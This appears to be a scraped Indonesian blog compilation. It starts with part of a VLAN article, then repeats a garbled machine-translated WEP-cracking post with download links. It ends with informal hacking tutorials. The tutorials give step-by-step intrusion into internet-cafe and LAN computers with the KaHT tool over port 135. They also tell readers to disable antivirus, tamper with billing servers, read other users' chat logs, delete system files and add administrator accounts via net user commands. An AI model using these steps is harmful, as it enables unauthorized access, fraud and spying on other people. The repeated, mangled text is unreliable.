Switch memungkinkan transmisi full-duplex untuk hubungan ke port dimana pengiriman dan penerimaan dapat dilakukan bersamaan dengan penggunakan
jalur tersebut diatas. Persyaratan untuk dapat mengadakan hubungan full-duplex adalah hanya satu komputer atau server saja yang dapat dihubungkan
ke satu port dari switch. Komputer tersebut harus memiliki network card yang mampu mengadakan hubungan full-duflex, serta collision detection
dan loopback harus disable.

Switch pula yang memungkinkan terjadinya segmentasi pada jaringan atau dengan kata lain switch-lah yang membentuk VLAN.Dengan adanya segmentasi
yang membatasi jalur broadcast akan mengakibatkan suatu VLAN tidak dapat menerima dan mengirimkan jalur broadcast ke VLAN lainnya. Hal ini secara
nyata akan mengurangi penggunaan jalur broadcast secara keseluruhan, mengurangi penggunaan bandwidth bagi pengguna, mengurangi kemungkinan
terjadinya broadcast storms (badai siaran) yang dapat menyebabkan kemacetan total di jaringan komputer.

Administrator jaringan dapat dengan mudah mengontrol ukuran dari jalur broadcast dengan cara mengurangi besarnya broadcast secara keseluruhan,
membatasi jumlah port switch yang digunakan dalam satu VLAN serta jumlah pengguna yang tergabung dalam suatu VLAN.

•Terlepas dari Topologi Secara Fisik

Jika jumlah server dan workstation berjumlah banyak dan berada di lantai dan gedung yang berlainan, serta dengan para personel yang juga tersebar
di berbagai tempat, maka akan lebih sulit bagi administrator jaringan yang menggunakan sistem LAN untuk mengaturnya, dikarenakan akan banyak
sekali diperlukan peralatan untuk menghubungkannya. Belum lagi apabila terjadi perubahan stuktur organisasi yang artinya akan terjadi banyak
perubahan letak personil akibat hal tersebut.

Permasalahan juga timbul dengan jaringan yang penggunanya tersebar di berbagai tempat artinya tidak terletak dalam satu lokasi tertentu secara
fisik. LAN yang dapat didefinisikan sebagai network atau jaringan sejumlah sistem komputer yang lokasinya terbatas secara fisik, misalnya dalam satu
gedung, satu komplek, dan bahkan ada yang menentukan LAN berdasarkan jaraknya sangat sulit untuk dapat mengatasi masalah ini.

Sedangkan VLAN yang memberikan kebebasan terhadap batasan lokasi secara fisik dengan mengijinkan workgroup yang terpisah lokasinya atau berlainan
gedung, atau tersebar untuk dapat terhubung secara logik ke jaringan meskipun hanya satu pengguna. Jika infrastuktur secara fisik telah
terinstalasi, maka hal ini tidak menjadi masalah untuk menambah port bagi VLAN yang baru jika organisasi atau departemen diperluas dan tiap
bagian dipindah. Hal ini memberikan kemudahan dalam hal pemindahan personel, dan tidak terlalu sulit untuk memindahkan pralatan yang ada
serta konfigurasinya dari satu tempat ke tempat lain.Untuk para pengguna yang terletak berlainan lokasi maka administrator jaringan hanya perlu
menkofigurasikannya saja dalam satu port yang tergabung dalam satu VLAN yang dialokasikan untuk bagiannya sehingga pengguna tersebut dapat bekerja
dalam bidangnya tanpa memikirkan apakah ia harus dalam ruangan yang sama dengan rekan-rekannya.

Hal ini juga mengurangi biaya yang dikeluarkan untuk membangun suatu jaringan baru apabila terjadi restrukturisasi pada suatu perusahaan,
karena pada LAN semakin banyak terjadi perpindahan makin banyak pula kebutuhan akan pengkabelan ulang, hampir keseluruhan perpindahan dan
perubahan membutuhkan konfigurasi ulang hub dan router.

VLAN memberikan mekanisme secara efektif untuk mengontrol perubahan ini serta mengurangi banyak biaya untuk kebutuhan akan mengkonfigurasi ulang
hub dan router. Pengguna VLAN dapat tetap berbagi dalam satu network address yang sama apabila ia tetap terhubung dalam satu swith port yang
sama meskipun tidak dalam satu lokasi. Permasalahan dalam hal perubahan lokasi dapat diselesaikan dengan membuat komputer pengguna tergabung
kedalam port pada VLAN tersebut dan mengkonfigurasikan switch pada VLAN tersebut.

•Mengembangkan Manajemen Jaringan

VLAN memberikan kemudahan, fleksibilitas, serta sedikitnya biaya yang dikeluarkan untuk membangunnya. VLAN membuat jaringan yang besar lebih
mudah untuk diatur manajemennya karena VLAN mampu untuk melakukan konfigurasi secara terpusat terhadap peralatan yang ada pada lokasi
yang terpisah. Dengan kemampuan VLAN untuk melakukan konfigurasi secara terpusat, maka sangat menguntungkan bagi pengembangan manajemen
jaringan.

Dengan keunggulan yang diberikan oleh VLAN maka ada baiknya bagi setiap pengguna LAN untuk mulai beralih ke VLAN. VLAN yang merupakan
pengembangan dari teknologi LAN ini tidak terlalu banyak melakukan perubahan, tetapi telah dapat memberikan berbagai tambahan pelayanan
pada teknologi jaringan.

REFERENSI

1. [Tutang dan Kodarsyah, S.Kom], Belajar Jaringan Sendiri, Medikom
Pustaka Mandiri, Jakarta , 2001.
2. [Tanutama, Lukas dan Tanutama, Hosea] , Mengenal Local Area Network,
PT Elex Media Komputindo,Jakarta, 1992.
3. [Wijaya, Ir. Hendra] , Belajar Sendiri Cisco Router, PT Elex
Media komputindo, Jakarta, 2001.
4. [Purbo, Onno W, Basmalah, Adnan, Fahmi, Ismail,dan Thamrin, Achmad Husni]
, Buku Pintar Internet TCP/IP, PT Elex Media Komputindo,Jakarta 1998.
5. [IEEE], “Draft Standard for Virtual Bridge Local Area Networks,”
P802.1Q/D1, May 16, 1997
6. [Heywood, Drew], Konsep dan Penerapan Microsoft TCP/IP, Pearson Education
Asia Pte. Ltd dan Penerbit Andi Yogyakarta, 2000.
7. [Pleeger, Charless P], Security In Computing, Prentice Hall,1989.
8. [Sudibyono, ir. Agt Hanung], Instalasi dan Aplikasi Netware Novell,
Andi Offset,1992.
9. [Jogiyanto, HM]. Pengenalan Komputer , Andi Offset ,1992.
10.[Muammar. W. K, Ahmad], Laporan Karya Ilmiah “Virtual Local Area Network
sebagai alternatif model jaringan guna peningkatan keamanan dan efisiensi
dalam sebuah local area network ” , Bogor 2002
11.http://net21.ucdavis.edu
12.http://www.cisco.com
13.http://www.tele.sunyit.edu
14.Modul pelatihan Auditing Network Security, Laboratorium Elektronika
dan komponen ITB, 2001.

Wireless Hacking Live-Biro Penyelidikan Federal Versi Iso

WEP Hacking - The Next Generation
WEP merupakan skema enkripsi, berdasarkan RC-4 cipher, yang tersedia pada semua 802.11a, b g nirkabel dan produk. WEP menggunakan sejumlah bit disebut kunci untuk perebutan data informasi dalam rangka karena daun jalur akses atau klien adapter goreng dan pesan kemudian decrypted oleh penerima.

Kedua belah pihak harus memiliki kunci WEP, yang biasanya total 128 atau 64 bit panjang. A semi-acak 24 bit nomor yang disebut initialization Vektor (IV), adalah bagian dari tombol, sehingga 64 bit kunci WEP sebenarnya hanya berisi 40 bit r0; strongr1; enkripsi sementara kunci 128 bit memiliki 104. IV yang ditempatkan di dienkripsi framer17; s kepala, dan dikirim dalam teks.

Secara tradisional, crac * ing kunci WEP telah menjadi lambat membosankan dan proses. Penyerang akan memiliki untuk menangkap ratusan ribu atau jutaan packets?s64; r1; proses yang dapat mengambil jam atau bahkan hari, tergantung pada volume lalu lintas lewat melalui jaringan nirkabel. Setelah cukup paket yang diambil, yang WEP crac * ing program seperti Aircrac * akan digunakan untuk mencari kunci WEP.

Cepat-cepat untuk terakhir musim panas, ketika pertama dari generasi terbaru dari WEP cracking alat muncul. Generasi sekarang ini menggunakan kombinasi teknik statistik terfokus pada unik IVs diambil paksa dan hewan-serangan kamus untuk istirahat 128 bit kunci WEP dalam menit, bukan jam. Khusus sebagai Agen Bickers dicatat, r0; Ia doesnr17; t masalah jika anda menggunakan kunci WEP 128 bit, Anda rentan! R1;

WEP merupakan skema enkripsi, berdasarkan RC-4 cipher, yang tersedia pada semua 802.11a, b g nirkabel dan produk.
WEP menggunakan sejumlah bit disebut kunci untuk perebutan data informasi dalam rangka karena daun jalur akses atau klien adapter goreng dan pesan kemudian decrypted oleh penerima.

Kedua belah pihak harus memiliki kunci WEP, yang biasanya total 128 atau 64 bit panjang.
A semi-acak 24 bit nomor yang disebut initialization Vektor (IV), adalah bagian dari tombol, sehingga 64 bit kunci WEP sebenarnya hanya berisi 40 bit r0; strongr1; enkripsi sementara kunci 128 bit memiliki 104.
IV yang ditempatkan di dienkripsi framer17; s kepala, dan dikirim dalam teks.
Secara tradisional, cracking kunci WEP telah menjadi lambat membosankan dan proses.
Penyerang akan memiliki untuk menangkap ratusan ribu atau jutaan paket proses yang dapat mengambil jam atau bahkan hari, tergantung pada volume lalu lintas lewat melalui jaringan nirkabel.
Setelah cukup paket yang diambil, yang WEP cracking program seperti Aircrack akan digunakan untuk mencari kunci WEP.
Cepat-cepat untuk terakhir musim panas, ketika pertama dari generasi terbaru dari WEP cracking alat muncul.
Generasi sekarang ini menggunakan kombinasi teknik statistik terfokus pada unik IVs diambil paksa dan hewan-serangan kamus untuk istirahat 128 bit kunci WEP dalam menit, bukan jam.

Arah dasar:

1) Boot dari cd
2) mendapatkan kunci WEP
3) tulis di bawah
4) reboot ke jendela
5) koneksi menggunakan kunci WEP.

Arah dasar:

1) Boot dari cd
2) mendapatkan kunci WEP
3) tulis di bawah
4) reboot ke jendela
5) koneksi menggunakan kunci WEP.

Ini Link nya tinggal DL aja ^^

Easy-Share Part I. http://w16.easy-share.com/1700064274.html
Easy-Share Part II. http://w16.easy-share.com/1700064318.html
Easy-Share Part III. http://w16.easy-share.com/1700064323.html
Easy-Share Part IV. http://w16.easy-share.com/1700064324.html
Easy-Share Part V. http://w16.easy-share.com/1700064332.html
Easy-Share Part VI. http://w16.easy-share.com/1700064330.html
Easy-Share Part VII. http://w16.easy-share.com/1700064315.html

Cara Melacak IP ADDRESS dan REAL ADDRESS Seseorang

Cara Melacak IP ADDRESS dan REAL ADDRESS Seseorang Artikel ini ditulis tentang bagaimana cara melacak IP address suatu situs. Dalam artikel ini Saya akan membahas hal-hal berikut:

1. Melacak alamat IP suatu situs

2. Melacak Real Adress server suatu situs

3. Cara Mengetahui IP address lawan chatting kita (:::::—– Pembahasan —–:::)

1. Melacak alamat IP suatu situs Untuk mengetahui alamat IP suatu situs, kita dapat melakukan PING terhadap situs tersebut. Caranya: Masuk ke command Prompt dan ketikan PING WWW.SITUS-YANG-DILACAK.COM lalu tekan enter. Maka akan muncul alamat Ip situs tersebut.

2. Melacak Lokasi server (real address) suatu situs Kita dapat melacak lokasi server suatu situs hanya dengan mengetahui alamat situsnya saja. Coba anda buka www.domainwhitepages.com Tinggal masukkan IP address situs tadi atau masukkan alamat situsnya dan anda akan mendapatkan info lengkap tentang server dari situs tersebut diantaranya adalah lokasi negara dan kota.

3. Melacak IP address lawan chatting kita Saat kita menggunakan Yahoo messenger, sebenarnya kita bisa mengetahui alamat IP dari lawan chatting kita. Caranya: :: Kirimkan suatu file pada lawan chat kita. :: Lalu masuklah ke Command Prompt (MSDOS) dan ketikkan NETSTAT -N lalu tekan enter, maka alamat IP lawan chatting anda (yang telah anda kirimi file tadi) akan muncul beserta port yang digunakan untuk pengiriman file. :: Untuk mengetahui lokasi lawan chatting anda (real address) seperti ia berada di kampus atau di warnet mana, tinggal anda chek di www.domainwhitepages.com dengan mempergunakan alamat IP yang anda dapatkan.

2 : Melacak ip addreas di yahoo Mesengger dan mesengger lainnya Banyak para Newbie tidak tahu cara menampilkan ip addreas teman chatnya di Yahoo Messenger, AOL dan lainnya, memang untuk melakukannya kita butuh triks, berbeda dengan IRC yang tinggal di whois aja, baik langsung saja kita memulai tutorialnya, pertama-tama kirimkankan file apa saja yang anda punya ke teman chatting anda dimana ini fungsinya sebagai timing waktu agar anda punya waktu untuk mengetikkan perintah-perintah untuk menampilkan ip addreas teman chat anda, disarankan diatas 600kb, lebih besar itu lebih bagus karena itu akan menyebabkan waktu anda lebih banyak.

1.Segera buka MS-DOS anda, lalu ketikkan netstat -n lalu akan tampil ip teman chat anda, misalkan saja muncul tampilan sebagai berikut : 202.133.80.45 : 5000+++ ->> ip ini ( 202.133.80.45) ternyata setelah dicek itu milik Graha Net, nah ahkirnya ketahuan tuh si pemakai messenger di warnet mana, nah kalau 5000+ itu adalah portnya yang dikirimin file ama anda. Tujuan dari tutorial ini bahwa segala macam komunikasi diinternet tanpa penggunaan proxy dan semacamnya masih dapat dilacak dengan begitu mudahnya, sehingga gue mengingatkan untuk penggunaan proxy anonymous setiap anda berselancar di internet jika anda benar-benar ingin mengurangi resiko dari berbagai jenis pelacakan.

2. Cara masuk ke DOS pada Windows XP yang serba dikunci Banyak warnet yang membatasi akses gerak kita di Windows seperti fasilitas DOS, Windows Explorer, setting dan sebagainya dalam keadaan tidak dapat kita sentuh, huh, emang nyebelin kalo kita bener-bener perlu akses ini Gue punya jawaban Cara masuk di DOS pada Windows XP yang serba di lock fasilitasnya : 1. Pada icon dalam dekstop atau start menu di klik kanan, lalu pilih properties 2. Di properties pilihlah “find target…” 3. Muncul Window lalu pilih search diatas 4. Pada Search pilihlah “All Files and folders” 5. Lalu cari file “cmd.exe” di windows 6. Jika di temukan maka jalankan file cmd.exe. 7. Dengan menjalankan file cmd.exe maka anda telah masuk ke dos Jika ternyata penguncian benar-benar total maka anda dapat mengubah registry windows melalui pembuatan file *.reg dengan notepad / word pad, kemudian anda jalankan file *.reg tersebut, cara untuk membuatnya ada dihalaman ini juga. Tujuan dari tutorial ini agar kita dapat lebih banyak bergerak leluasa diwarnet-warnet yang keamanannya terlalu dilindungi sehingga membuat kita tidak bisa berbuat banyak di komputer tersebut.

3. Menembus fasilitas umum windows yang terlalu dibatasi Menjengkelkan jika fasilitas MS-DOS, RUN, Find dan sebangsanya di hilangkan dari desktop di komputer warnet, biar ga terlalu BT, kita tembus aja pakek cara ini 1. Masuk ke Notepad / Wordpad / Ms Word 2.Laluketik dibawah ini REGEDIT4 [HKEY_CURRENT_USER\""SOFTWARE\""Microsoft\""Windows\""CurrentVersion\""Policies\""System] “DisableRegistryTools”=dword:00000001 [HKEY_CURRENT_USER\""SOFTWARE\""Microsoft\""Windows\""CurrentVersion\""Policies\""Explorer] “NoRun”=dword:00000000 3. Simpanlah di dengan nama file berekstensi *.reg lalu jalankan file *.reg yang anda buat tadi lalu anda restart Tujuan dari tutorial ini untuk para netter yang merasa kesal dengan komputer warnet, kantor atau sebagainya yang dimana warnet, kantor atau lainnya melakukan pembatasan hak aksesnya terlalu berlebihan terhadap komputer yang kita gunakan. 4. Cara masuk di komputer lain lewat DOS (Windows XP / 2000) Anda ingin masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja ? itu mudah, semua caranya ada disini. 1.Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu internet Maniac (Internet Maniac.exe) … Download Interenet Maniac Berfungsi untuk mengetahui ip addreas client melalui computer name / hostname KaHT (KaHt.exe) … Download program hacker KaHT Berfungsi sebagai program untuk menerobos ke computer server atau client Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pake WINZIP atau pake apa. Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Untuk Windows XP Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan. Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini) Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul (Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighboure saja) Setelah loe dapetin sasaran computer yang mau di masukin / diremote maka loe langsung aja jalankan program Internet Maniac Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki. Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat. Cara masuk DOS Mode Untuk Windows XP : Masuklah ke Start, All programs, Accessories lalu Command Prompt Untuk Windows 95/98/Me/NT/2000 Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:\”"KaH) maka ketikkan “CD\”"KaHT” dan seterusnya. Jika sudah, ini saatnya? Ketikkan “KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran. kalau bingung bisa begini : “KaHT Ip1 ip2? ip1 : ip awal yang discan ip2 : ip terahkir yang discan Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho. Maka ketikkan saja “KaHT 192.168.0.0 192.168.0.1? lalu enter aja Nah disini nanti program akan bekerja otomatis. Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di “c:\”"windows\”"system” milik komputer tujuan / sasaran setelah pen-scan-an selesai. Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe Nah kalo udah begini kita bisa berkreasi : Pingin biaya warnet kita lebih murah ? gampang masuk aja di billing server, ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus nanti ketahuan ama operator warnetnya, hehe. Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut, biasanya seh di C:\”"Program Files\”"MiRC, buka file MiRC.INI, lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat “/logs” maksudnya kalau tadi di C:\”"program Files\”"MiRC program MiRCnya maka cukup masuk aja di C:\”"Program Files\”"MiRC\”"Logs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan. Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja file-file systemnya, hehe. Diatas cuman kreasi dikit aja, loe bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab.. 5.Membuat akses administrator Windows untuk kita lewat komputer lain Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik. Melihat akses guest dan administrator di Windows Ketik : net user Melihat aktif tidaknya guest di Windows Ketik : net user guest Membuat akses guest menjadi Administrator dengan perintah : Ketik : net localgroup ASdministrators Guest /add Membuat akses adminstrator sendiri :

1. Ketik : net user /add

2. Ketik : net localgroup Administrators /add Menghapus akses administrator Ketik : net localgroup Users /delete 1. Cara mengetahui password administrator Windows – Download Proactive Windows Security Explorer

sumber: http://www.scribd.com/

Wireless Hacking Live-Biro Penyelidikan Federal

WEP Hacking - The Next Generation
WEP merupakan skema enkripsi, berdasarkan RC-4 cipher, yang tersedia pada semua 802.11a, b g nirkabel dan produk. WEP menggunakan sejumlah bit disebut kunci untuk perebutan data informasi dalam rangka karena daun jalur akses atau klien adapter goreng dan pesan kemudian decrypted oleh penerima.

Kedua belah pihak harus memiliki kunci WEP, yang biasanya total 128 atau 64 bit panjang. A semi-acak 24 bit nomor yang disebut initialization Vektor (IV), adalah bagian dari tombol, sehingga 64 bit kunci WEP sebenarnya hanya berisi 40 bit r0; strongr1; enkripsi sementara kunci 128 bit memiliki 104. IV yang ditempatkan di dienkripsi framer17; s kepala, dan dikirim dalam teks.

Secara tradisional, crac * ing kunci WEP telah menjadi lambat membosankan dan proses. Penyerang akan memiliki untuk menangkap ratusan ribu atau jutaan packets?s64; r1; proses yang dapat mengambil jam atau bahkan hari, tergantung pada volume lalu lintas lewat melalui jaringan nirkabel. Setelah cukup paket yang diambil, yang WEP crac * ing program seperti Aircrac * akan digunakan untuk mencari kunci WEP.

Cepat-cepat untuk terakhir musim panas, ketika pertama dari generasi terbaru dari WEP cracking alat muncul. Generasi sekarang ini menggunakan kombinasi teknik statistik terfokus pada unik IVs diambil paksa dan hewan-serangan kamus untuk istirahat 128 bit kunci WEP dalam menit, bukan jam. Khusus sebagai Agen Bickers dicatat, r0; Ia doesnr17; t masalah jika anda menggunakan kunci WEP 128 bit, Anda rentan! R1;

WEP merupakan skema enkripsi, berdasarkan RC-4 cipher, yang tersedia pada semua 802.11a, b g nirkabel dan produk.
WEP menggunakan sejumlah bit disebut kunci untuk perebutan data informasi dalam rangka karena daun jalur akses atau klien adapter goreng dan pesan kemudian decrypted oleh penerima.

Kedua belah pihak harus memiliki kunci WEP, yang biasanya total 128 atau 64 bit panjang.
A semi-acak 24 bit nomor yang disebut initialization Vektor (IV), adalah bagian dari tombol, sehingga 64 bit kunci WEP sebenarnya hanya berisi 40 bit r0; strongr1; enkripsi sementara kunci 128 bit memiliki 104.
IV yang ditempatkan di dienkripsi framer17; s kepala, dan dikirim dalam teks.
Secara tradisional, cracking kunci WEP telah menjadi lambat membosankan dan proses.
Penyerang akan memiliki untuk menangkap ratusan ribu atau jutaan paket proses yang dapat mengambil jam atau bahkan hari, tergantung pada volume lalu lintas lewat melalui jaringan nirkabel.
Setelah cukup paket yang diambil, yang WEP cracking program seperti Aircrack akan digunakan untuk mencari kunci WEP.
Cepat-cepat untuk terakhir musim panas, ketika pertama dari generasi terbaru dari WEP cracking alat muncul.
Generasi sekarang ini menggunakan kombinasi teknik statistik terfokus pada unik IVs diambil paksa dan hewan-serangan kamus untuk istirahat 128 bit kunci WEP dalam menit, bukan jam.

Arah dasar:

1) Boot dari cd
2) mendapatkan kunci WEP
3) tulis di bawah
4) reboot ke jendela
5) koneksi menggunakan kunci WEP.

Arah dasar:

1) Boot dari cd
2) mendapatkan kunci WEP
3) tulis di bawah
4) reboot ke jendela
5) koneksi menggunakan kunci WEP.

Ini Link nya tinggal DL aja ^^

Easy-Share Part I. http://w16.easy-share.com/1700064274.html
Easy-Share Part II. http://w16.easy-share.com/1700064318.html
Easy-Share Part III. http://w16.easy-share.com/1700064323.html
Easy-Share Part IV. http://w16.easy-share.com/1700064324.html
Easy-Share Part V. http://w16.easy-share.com/1700064332.html
Easy-Share Part VI. http://w16.easy-share.com/1700064330.html
Easy-Share Part VII. http://w16.easy-share.com/1700064315.html

Wireless Hacking Live-Biro Penyelidikan Federal Vrsi Iso

WEP Hacking - The Next Generation
WEP merupakan skema enkripsi, berdasarkan RC-4 cipher, yang tersedia pada semua 802.11a, b g nirkabel dan produk. WEP menggunakan sejumlah bit disebut kunci untuk perebutan data informasi dalam rangka karena daun jalur akses atau klien adapter goreng dan pesan kemudian decrypted oleh penerima.

Kedua belah pihak harus memiliki kunci WEP, yang biasanya total 128 atau 64 bit panjang. A semi-acak 24 bit nomor yang disebut initialization Vektor (IV), adalah bagian dari tombol, sehingga 64 bit kunci WEP sebenarnya hanya berisi 40 bit r0; strongr1; enkripsi sementara kunci 128 bit memiliki 104. IV yang ditempatkan di dienkripsi framer17; s kepala, dan dikirim dalam teks.

Secara tradisional, crac * ing kunci WEP telah menjadi lambat membosankan dan proses. Penyerang akan memiliki untuk menangkap ratusan ribu atau jutaan packets?s64; r1; proses yang dapat mengambil jam atau bahkan hari, tergantung pada volume lalu lintas lewat melalui jaringan nirkabel. Setelah cukup paket yang diambil, yang WEP crac * ing program seperti Aircrac * akan digunakan untuk mencari kunci WEP.

Cepat-cepat untuk terakhir musim panas, ketika pertama dari generasi terbaru dari WEP cracking alat muncul. Generasi sekarang ini menggunakan kombinasi teknik statistik terfokus pada unik IVs diambil paksa dan hewan-serangan kamus untuk istirahat 128 bit kunci WEP dalam menit, bukan jam. Khusus sebagai Agen Bickers dicatat, r0; Ia doesnr17; t masalah jika anda menggunakan kunci WEP 128 bit, Anda rentan! R1;

WEP merupakan skema enkripsi, berdasarkan RC-4 cipher, yang tersedia pada semua 802.11a, b g nirkabel dan produk.
WEP menggunakan sejumlah bit disebut kunci untuk perebutan data informasi dalam rangka karena daun jalur akses atau klien adapter goreng dan pesan kemudian decrypted oleh penerima.

Kedua belah pihak harus memiliki kunci WEP, yang biasanya total 128 atau 64 bit panjang.
A semi-acak 24 bit nomor yang disebut initialization Vektor (IV), adalah bagian dari tombol, sehingga 64 bit kunci WEP sebenarnya hanya berisi 40 bit r0; strongr1; enkripsi sementara kunci 128 bit memiliki 104.
IV yang ditempatkan di dienkripsi framer17; s kepala, dan dikirim dalam teks.
Secara tradisional, cracking kunci WEP telah menjadi lambat membosankan dan proses.
Penyerang akan memiliki untuk menangkap ratusan ribu atau jutaan paket proses yang dapat mengambil jam atau bahkan hari, tergantung pada volume lalu lintas lewat melalui jaringan nirkabel.
Setelah cukup paket yang diambil, yang WEP cracking program seperti Aircrack akan digunakan untuk mencari kunci WEP.
Cepat-cepat untuk terakhir musim panas, ketika pertama dari generasi terbaru dari WEP cracking alat muncul.
Generasi sekarang ini menggunakan kombinasi teknik statistik terfokus pada unik IVs diambil paksa dan hewan-serangan kamus untuk istirahat 128 bit kunci WEP dalam menit, bukan jam.

Arah dasar:

1) Boot dari cd
2) mendapatkan kunci WEP
3) tulis di bawah
4) reboot ke jendela
5) koneksi menggunakan kunci WEP.

Arah dasar:

1) Boot dari cd
2) mendapatkan kunci WEP
3) tulis di bawah
4) reboot ke jendela
5) koneksi menggunakan kunci WEP.

Ini Link nya tinggal DL aja ^^

Easy-Share Part I. http://w16.easy-share.com/1700064274.html
Easy-Share Part II. http://w16.easy-share.com/1700064318.html
Easy-Share Part III. http://w16.easy-share.com/1700064323.html
Easy-Share Part IV. http://w16.easy-share.com/1700064324.html
Easy-Share Part V. http://w16.easy-share.com/1700064332.html
Easy-Share Part VI. http://w16.easy-share.com/1700064330.html
Easy-Share Part VII. http://w16.easy-share.com/1700064315.html

Cara Melacak IP ADDRESS dan REAL ADDRESS Seseorang

Cara Melacak IP ADDRESS dan REAL ADDRESS Seseorang Artikel ini ditulis tentang bagaimana cara melacak IP address suatu situs. Dalam artikel ini Saya akan membahas hal-hal berikut:

1. Melacak alamat IP suatu situs

2. Melacak Real Adress server suatu situs

3. Cara Mengetahui IP address lawan chatting kita (:::::—– Pembahasan —–:::)

1. Melacak alamat IP suatu situs Untuk mengetahui alamat IP suatu situs, kita dapat melakukan PING terhadap situs tersebut. Caranya: Masuk ke command Prompt dan ketikan PING WWW.SITUS-YANG-DILACAK.COM lalu tekan enter. Maka akan muncul alamat Ip situs tersebut.

2. Melacak Lokasi server (real address) suatu situs Kita dapat melacak lokasi server suatu situs hanya dengan mengetahui alamat situsnya saja. Coba anda buka www.domainwhitepages.com Tinggal masukkan IP address situs tadi atau masukkan alamat situsnya dan anda akan mendapatkan info lengkap tentang server dari situs tersebut diantaranya adalah lokasi negara dan kota.

3. Melacak IP address lawan chatting kita Saat kita menggunakan Yahoo messenger, sebenarnya kita bisa mengetahui alamat IP dari lawan chatting kita. Caranya: :: Kirimkan suatu file pada lawan chat kita. :: Lalu masuklah ke Command Prompt (MSDOS) dan ketikkan NETSTAT -N lalu tekan enter, maka alamat IP lawan chatting anda (yang telah anda kirimi file tadi) akan muncul beserta port yang digunakan untuk pengiriman file. :: Untuk mengetahui lokasi lawan chatting anda (real address) seperti ia berada di kampus atau di warnet mana, tinggal anda chek di www.domainwhitepages.com dengan mempergunakan alamat IP yang anda dapatkan.

2 : Melacak ip addreas di yahoo Mesengger dan mesengger lainnya Banyak para Newbie tidak tahu cara menampilkan ip addreas teman chatnya di Yahoo Messenger, AOL dan lainnya, memang untuk melakukannya kita butuh triks, berbeda dengan IRC yang tinggal di whois aja, baik langsung saja kita memulai tutorialnya, pertama-tama kirimkankan file apa saja yang anda punya ke teman chatting anda dimana ini fungsinya sebagai timing waktu agar anda punya waktu untuk mengetikkan perintah-perintah untuk menampilkan ip addreas teman chat anda, disarankan diatas 600kb, lebih besar itu lebih bagus karena itu akan menyebabkan waktu anda lebih banyak.

1.Segera buka MS-DOS anda, lalu ketikkan netstat -n lalu akan tampil ip teman chat anda, misalkan saja muncul tampilan sebagai berikut : 202.133.80.45 : 5000+++ ->> ip ini ( 202.133.80.45) ternyata setelah dicek itu milik Graha Net, nah ahkirnya ketahuan tuh si pemakai messenger di warnet mana, nah kalau 5000+ itu adalah portnya yang dikirimin file ama anda. Tujuan dari tutorial ini bahwa segala macam komunikasi diinternet tanpa penggunaan proxy dan semacamnya masih dapat dilacak dengan begitu mudahnya, sehingga gue mengingatkan untuk penggunaan proxy anonymous setiap anda berselancar di internet jika anda benar-benar ingin mengurangi resiko dari berbagai jenis pelacakan.

